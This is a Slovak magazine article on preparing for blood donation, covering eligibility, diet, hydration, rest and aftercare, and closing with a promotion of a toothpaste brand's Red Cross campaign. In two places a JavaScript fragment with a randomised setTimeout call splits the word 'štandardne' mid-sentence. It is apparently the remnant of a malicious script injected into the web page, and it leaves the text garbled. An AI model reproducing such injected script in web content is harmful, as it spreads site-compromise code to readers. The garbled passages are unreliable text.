Ako sa správne pripraviť na darovanie krvi?

| september 15, 2020

Každý z nás sa môže ocitnúť v situácii, kedy bude nevyhnutne potrebovať cudziu krv. Ako by sme ju však získali, ak by sa ju niekto iný nerozhodol darovať? Darcovstvo krvi je skutočne významným činom, ktorý dennodenne zachraňuje životy. Čo je dobré vedieť predtým, ako sa pre tento dôležitý krok rozhodnete? A ako inak môžete pomôcť? 

Darovanie krvi sa uskutočňuje v odberových centrách slovenských nemocníc. Krv sa štandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andardne odoberá v množstve 450 ml a hoci to trvá iba 5 – 7 minút, podľa štatistík dokáže jedno darovanie zachrániť až 3 životy. Darovaním krvi sa teda stávate skutočným hrdinom.

Kto môže darovať krv?

Hoci je potreba krvi enormná, nemôže ju darovať každý. Na to, aby krv v cudzom organizme plnila životné funkcie, je dôležité, aby bola stopercentne zdravá. 

“Aby ste boli vhodným darcom, musíte mať aspoň 18 rokov a 50 kg. Pravidelní darcovia môžu darovať krv až do 65 rokov. Mnohé chronické ochorenia, sezónne alergie, operácie a moderné kozmetické zákroky obmedzujú darovanie krvi, preto je vhodné sa na ne informovať skôr ako pôjdete darovať krv priamo v odberovom centre,” približuje MUDr. Ján Gyarfáš, z Kliniky onkohematológie LFUK a NOÚ v Bratislave.

Ak spĺňate základné predpoklady, môžete sa objednať na darovanie krvi. Muži môžu darovať krv každé 3 mesiace a ženy každé 4 mesiace. Viac informácii nájdete na stránke Slovenského Červeného kríža.

Čo je dôležité urobiť pred darovaním krvi?

Darovanie krvi je vo svojej podstate celkom jednoduchý proces, no napriek tomu si vyžaduje prípravu. Kvalitu krvi totiž ovplyvňuje veľa faktorov, o ktorých by ste to možno ani nepovedali. Aby ste sa vyhli nepríjemným pocitom po darovaní krvi, odporúčame dodržať zopár pravidiel.

1. Nehladujte 

Hoci ste zvyknutí, že na odber krvi sa chodí nalačno, v prípade darovania krvi to neplatí. Pred darovaním krvi sa naraňajkujte! Vhodné je jesť ľahké sacharidové jedlá ako ovocie, zeleninu, sucháre, vločky, netukové pečivo, džem, med či lekvár.

2. Vyhnite sa mastným jedlám 

Večer a ráno pred darovaním sa vyhnite tučným a mastným jedlám, ako je syr, maslo, smotana, údeniny, chipsy a arašidy. Majú vysoký podiel tuku, ktorý organizmus zbytočne zaťažuje a tým klesá aj kvalita krvi.

3. Odpočiňte si 

Večer pred odberom vynechajte fitko, doprajte si kvalitný spánok, ktorým zabezpečíte regeneráciu organizmu. Výrazne tým eliminujete fyzický aj psychický stres. 

4. Pite dostatok tekutín 

Darovanie krvi je šľachetným činom, no aj pre váš organizmus je to náročný proces. Pri štandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andardnom darovaní krvi Vám odoberú cca 450 ml krvi, čo je omnoho vyšší objem ako pri bežnom odbere u lekára. “Pred darovaním krvi je preto potrebné dbať na dostatočný pitný režim. Deň pred odberom vypite aspoň dva litre vody alebo čaju. Pitný režim je vhodné doplniť ešte aspoň pol litrom vody, minerálky alebo ovocného čaju tesne pred odberom,” odporúča MUDr. Gyarfáš.

5. Nefajčite a nepite alkohol 

Darovaná krv musí spĺňať náročné požiadavky. Musí byť od zdravého darcu krvi, aby bola kvalitná, jej odber je prísne sledovaný a realizovaný za prísnych podmienok. Nesmie obsahovať akékoľvek škodlivé látky. Deň pred darovaním krvi preto nepite žiadny alkohol a minimálne 6 hodín nefajčite.

Čo je dôležité urobiť po darovaní krvi?

Darovanie krvi sa u niektorých jedincov spája s nepríjemnými pocitmi. U niektorých darcov krvi sa objavuje slabý závrat, únava. Preto aj po darovaní krvi myslite na pitný režim, naobedujte sa, ak nemusíte nešoférujte, oddýchnite si. Ak pocítite závrat alebo iný náznak nepohodlia, oznámte to zdravotnému personálu v odberovom centre.

Po odbere by ste nemali dvíhať ťažké predmety, vynechajte akúkoľvek namáhavú fyzickú aktivitu. Namiesto toho si doprajte oddych a kvalitný spánok, ktorý si po takto náročnom procese rozhodne zaslúžite! K bežným aktivitám sa odporúča vrátiť až po uplynutí 24 hodín.

Ako inak môžete pomôcť?

Ak môžete darovať krv, pokúste sa vykročiť zo svojej komfortnej zóny a pomôžte iným. Ak nie ste vhodným darcom, darcovstvo krvi môžete podporiť aj kúpou akéhokoľvek výrobku parodontax. Tým pomôžete nielen sebe. Značka parodontax totiž v spolupráci s organizáciou Červený kríž predstavila kampaň Darujte krv, ktorou motivuje k darcovstvu krvi a šíri osvetu o tomto ušľachtilom čine.

 

Zdroj a foto: TS

Tags:

Category: HOMEPAGE, ZDRAVIE a FIT

Comments are closed.